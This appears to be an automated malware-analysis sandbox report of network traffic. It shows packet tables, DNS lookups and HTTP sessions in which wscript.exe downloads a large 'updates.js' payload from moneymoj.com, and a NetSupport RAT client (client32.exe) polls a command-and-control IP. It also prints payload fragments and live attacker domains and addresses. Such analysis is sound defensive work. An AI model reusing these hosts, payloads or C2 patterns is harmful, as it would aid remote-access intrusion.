                                                                                Sep 10, 2024 16:33:48.823853970 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.823878050 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.824203968 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.824222088 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.824304104 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.824305058 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.824320078 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.825218916 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.825234890 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.825314999 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.825329065 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.825376034 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.826656103 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.826673985 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.826718092 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.826734066 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.826782942 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.827060938 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.827078104 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.827153921 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.827153921 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.827169895 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.860657930 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.860680103 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.860764980 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.860835075 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.860882998 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.908426046 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.908442020 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.908612013 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.908638954 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.909909964 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.909954071 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.910006046 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.910024881 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.910072088 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.910521984 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.910541058 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.910624981 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.910624981 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.910644054 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.911171913 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.911190033 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.911253929 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.911253929 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.911271095 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.911979914 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.911993027 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.912072897 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.912072897 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.912091970 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.456886053 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.456940889 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.456953049 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.457006931 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.472042084 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.472062111 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.472121954 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.472137928 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.472168922 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.472189903 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.507733107 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.507750988 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.507826090 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.507832050 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.507874012 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.523890018 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.523907900 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.523961067 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.523966074 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.524012089 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.527864933 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.527880907 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.527944088 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.527947903 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.528009892 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.537764072 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.537781000 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.537846088 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.537856102 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.537897110 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.540282011 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.540297031 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.540375948 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.540380001 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.540492058 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.543360949 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.543379068 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.543450117 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.543456078 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.543507099 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.543879032 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.543890953 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.543947935 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.543951988 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.544001102 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.558990002 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.559020042 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.559072971 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.559087038 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.559118986 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.559142113 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.594543934 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.594569921 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.594633102 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.594643116 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.594687939 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.616693020 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.616715908 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.616761923 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.616774082 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.616835117 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.617741108 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.617755890 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.617816925 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.617820978 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.617871046 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.624607086 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.624622107 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.624692917 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.624696970 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.624742985 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.627051115 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.627063036 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.627121925 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.627125025 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.627166033 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.630227089 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.630239010 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.630295038 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.630299091 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.630330086 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.630784035 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.630795956 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.630841017 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.630844116 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.630877972 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.630892992 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.646019936 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.646033049 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.646119118 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.646122932 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.646169901 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.681821108 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.681848049 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.681906939 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.681919098 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.681950092 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.681974888 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.703440905 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.703466892 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.703530073 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.703540087 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.703582048 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.703591108 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.704427958 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.704444885 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.704497099 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.704500914 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.704551935 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.711363077 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.711389065 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.711435080 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.711437941 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.711478949 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.714232922 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.714250088 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.714310884 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.714318037 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.714368105 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.717039108 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.717055082 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.717109919 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.717113018 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.717155933 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.717585087 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.717606068 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.717668056 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.717672110 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.717720032 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.733215094 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.733232021 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.733298063 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.733303070 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.733350992 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.768183947 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.768198013 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.768269062 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.768273115 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.768315077 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.790515900 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.790538073 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.790610075 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.790620089 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.790661097 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.791250944 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.791265011 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.791332960 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.791337013 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.791389942 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.802040100 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.802061081 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.802120924 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.802130938 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.802170038 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.804709911 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.804725885 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.804780960 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.804789066 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.804830074 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.809439898 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.809464931 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.809535027 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.809544086 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.809576988 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.810185909 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.810200930 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.810312033 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.810318947 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.810374022 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.820163012 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.820183039 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.820246935 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.820260048 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.820301056 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.855442047 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.855460882 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.855537891 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.855546951 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.855591059 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.877530098 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.877551079 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.877619028 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.877629995 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.877679110 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.878060102 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.878073931 CEST4434973379.141.161.172192.168.2.6
Timestamp                             Source Port  Dest Port  Source IP    Dest IP
Sep 10, 2024 16:33:38.861236095 CEST  64797        53         192.168.2.6  1.1.1.1
Sep 10, 2024 16:33:38.898514986 CEST  53           64797      1.1.1.1      192.168.2.6
Sep 10, 2024 16:33:47.058327913 CEST  55588        53         192.168.2.6  1.1.1.1
Sep 10, 2024 16:33:47.102375031 CEST  53           55588      1.1.1.1      192.168.2.6
Sep 10, 2024 16:33:51.562561035 CEST  64833        53         192.168.2.6  1.1.1.1
Sep 10, 2024 16:33:51.581818104 CEST  53           64833      1.1.1.1      192.168.2.6
Timestamp                             Source IP    Dest IP  Trans ID  OP Code             Name                        Type            Class        DNS over HTTPS
Sep 10, 2024 16:33:38.861236095 CEST  192.168.2.6  1.1.1.1  0xec0d    Standard query (0)  moneymoj.com                A (IP address)  IN (0x0001)  false
Sep 10, 2024 16:33:47.058327913 CEST  192.168.2.6  1.1.1.1  0x8df4    Standard query (0)  ipva2024-detransp.com       A (IP address)  IN (0x0001)  false
Sep 10, 2024 16:33:51.562561035 CEST  192.168.2.6  1.1.1.1  0x47fd    Standard query (0)  geo.netsupportsoftware.com  A (IP address)  IN (0x0001)  false
Timestamp                             Source IP  Dest IP      Trans ID  Reply Code    Name                        CName  Address         Type            Class        DNS over HTTPS
Sep 10, 2024 16:33:38.898514986 CEST  1.1.1.1    192.168.2.6  0xec0d    No error (0)  moneymoj.com                -      8.39.147.104    A (IP address)  IN (0x0001)  false
Sep 10, 2024 16:33:47.102375031 CEST  1.1.1.1    192.168.2.6  0x8df4    No error (0)  ipva2024-detransp.com       -      79.141.161.172  A (IP address)  IN (0x0001)  false
Sep 10, 2024 16:33:51.581818104 CEST  1.1.1.1    192.168.2.6  0x47fd    No error (0)  geo.netsupportsoftware.com  -      104.26.1.231    A (IP address)  IN (0x0001)  false
Sep 10, 2024 16:33:51.581818104 CEST  1.1.1.1    192.168.2.6  0x47fd    No error (0)  geo.netsupportsoftware.com  -      172.67.68.212   A (IP address)  IN (0x0001)  false
Sep 10, 2024 16:33:51.581818104 CEST  1.1.1.1    192.168.2.6  0x47fd    No error (0)  geo.netsupportsoftware.com  -      104.26.0.231    A (IP address)  IN (0x0001)  false
• moneymoj.com
• ipva2024-detransp.com
• 5.181.159.137 (connection: keep-alive; cmd=poll; info=1; ack=1)
• geo.netsupportsoftware.com
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.6  49735        5.181.159.137   443               2760  C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe
Timestamp                             Bytes transferred  Direction  Data
Sep 10, 2024 16:33:51.573811054 CEST  218                OUT
POST http://5.181.159.137/fakeurl.htm HTTP/1.1
User-Agent: NetSupport Manager/1.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Host: 5.181.159.137
Connection: Keep-Alive

CMD=POLL
INFO=1
ACK=1


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.6  49736        104.26.1.231    80                2760  C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe
Timestamp                             Bytes transferred  Direction  Data
Sep 10, 2024 16:33:51.598952055 CEST  118                OUT
GET /location/loca.asp HTTP/1.1
Host: geo.netsupportsoftware.com
Connection: Keep-Alive
Cache-Control: no-cache
Sep 10, 2024 16:33:52.274112940 CEST  931                IN
HTTP/1.1 200 OK
Date: Tue, 10 Sep 2024 14:33:52 GMT
Content-Type: text/html; Charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
CF-Ray: 8c1022b40ad342e8-EWR
CF-Cache-Status: DYNAMIC
Access-Control-Allow-Origin: *
Cache-Control: private
Set-Cookie: ASPSESSIONIDCADAQTAA=HNJHEEODIJJBFPLPGNPCHNOB; path=/
Strict-Transport-Security: max-age=31536000; includeSubDomains
Vary: Accept-Encoding
cf-apo-via: origin,host
Referrer-Policy: strict-origin-when-cross-origin
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zrfyrfUhRPBCArwWNrJaWoQ1YhGyO1DdmF8L9tYwtp9fOaFYnhc4XF8FtQ7b0CyIvK4MQxf21tysZ6JdYlXLNJRrtUzDGPlTIchpbGMWQ4o%2FLxIrqi9BWOu%2BmmJaZmnMye2nDB1nVEYyQ7Pf"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
Data Raw: 31 30 0d 0a 34 30 2e 37 33 35 37 2c 2d 37 34 2e 31 37 32 34 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1040.7357,-74.17240


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.6  49718        8.39.147.104    443               2324  C:\Windows\System32\wscript.exe
Timestamp                Bytes transferred  Direction  Data
2024-09-10 14:33:39 UTC  210                OUT
POST /cdn-vs/update.php?88 HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: en-CH
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Content-Length: 0
Host: moneymoj.com
2024-09-10 14:33:39 UTC  357                IN
HTTP/1.1 200 OK
Date: Tue, 10 Sep 2024 14:33:39 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Description: File Transfer
Content-Disposition: attachment; filename=updates.js
Content-Transfer-Encoding: binary
Expires: 0
Cache-Control: must-revalidate
Pragma: public
Content-Length: 3687106
Connection: close
Content-Type: application/octet-stream
2024-09-10 14:33:39 UTC  16384              IN
Data Ascii: (function() { function r(e, n, t) { function o(i, f) { if (!n[i]) { if (!e[i]) { var c = "function" == typeof require && require; if (!f && c) return c(i, !0);
2024-09-10 14:33:39 UTC  16384              IN
Data Ascii: OG, moduleId: k.moduleLoaderState_.moduleName }; else throw Error('Invalid module name "' + g + '"'); } finally { k.moduleLoaderState_ = b }};k.loadModuleFromSource_ = function(a, b) { eval(k.CLOSU
2024-09-10 14:33:39 UTC  16384              IN
Data Ascii: function(a, b, c, f) { var g = c; n(a, function(h, l) { g = b.call(f, g, h, l, a) }); return g};k.array.reduce = oa;k.array.reduceRight = k.NATIVE_ARRAY_PROTOTYPES && (m || Array.prototype.reduceRight) ? function(a, b, c, f) {
2024-09-10 14:33:39 UTC  16384              IN
Data Ascii: ct.findValue = function(a, b, c) { return (b = k.object.findKey(a, b, c)) && a[b]};k.object.isEmpty = function(a) { for (var b in a) return !1; return !0};k.object.clear = function(a) { for (var b in a) delete a[b]};k.object.remove =
2024-09-10 14:33:39 UTC  16384              IN
                                                                                Data Ascii: agName.DATALIST = "DATALIST";k.dom.TagName.DD = "DD";k.dom.TagName.DEL = "DEL";k.dom.TagName.DETAILS = "DETAILS";k.dom.TagName.DFN = "DFN";k.dom.TagName.DIALOG = "DIALOG";k.dom.TagName.DIR = "DIR";k.dom.TagName.DIV = "DIV";k.dom.TagName.DL = "DL";
                                                                                2024-09-10 14:33:39 UTC16384INData Raw: 74 6f 53 74 72 69 6e 67 28 29 0a 7d 3b 0a 64 2e 69 6d 70 6c 65 6d 65 6e 74 73 47 6f 6f 67 49 31 38 6e 42 69 64 69 44 69 72 65 63 74 69 6f 6e 61 6c 53 74 72 69 6e 67 20 3d 20 21 30 3b 0a 64 2e 67 65 74 44 69 72 65 63 74 69 6f 6e 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 72 65 74 75 72 6e 20 6b 2e 69 31 38 6e 2e 62 69 64 69 2e 44 69 72 2e 4c 54 52 0a 7d 3b 0a 64 2e 74 6f 53 74 72 69 6e 67 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 72 65 74 75 72 6e 20 74 68 69 73 2e 70 72 69 76 61 74 65 44 6f 4e 6f 74 41 63 63 65 73 73 4f 72 45 6c 73 65 54 72 75 73 74 65 64 52 65 73 6f 75 72 63 65 55 72 6c 57 72 61 70 70 65 64 56 61 6c 75 65 5f 20 2b 20 22 22 0a 7d 3b 0a 6b 2e 68 74 6d 6c 2e 54 72 75 73 74 65 64 52 65 73 6f 75 72 63 65 55
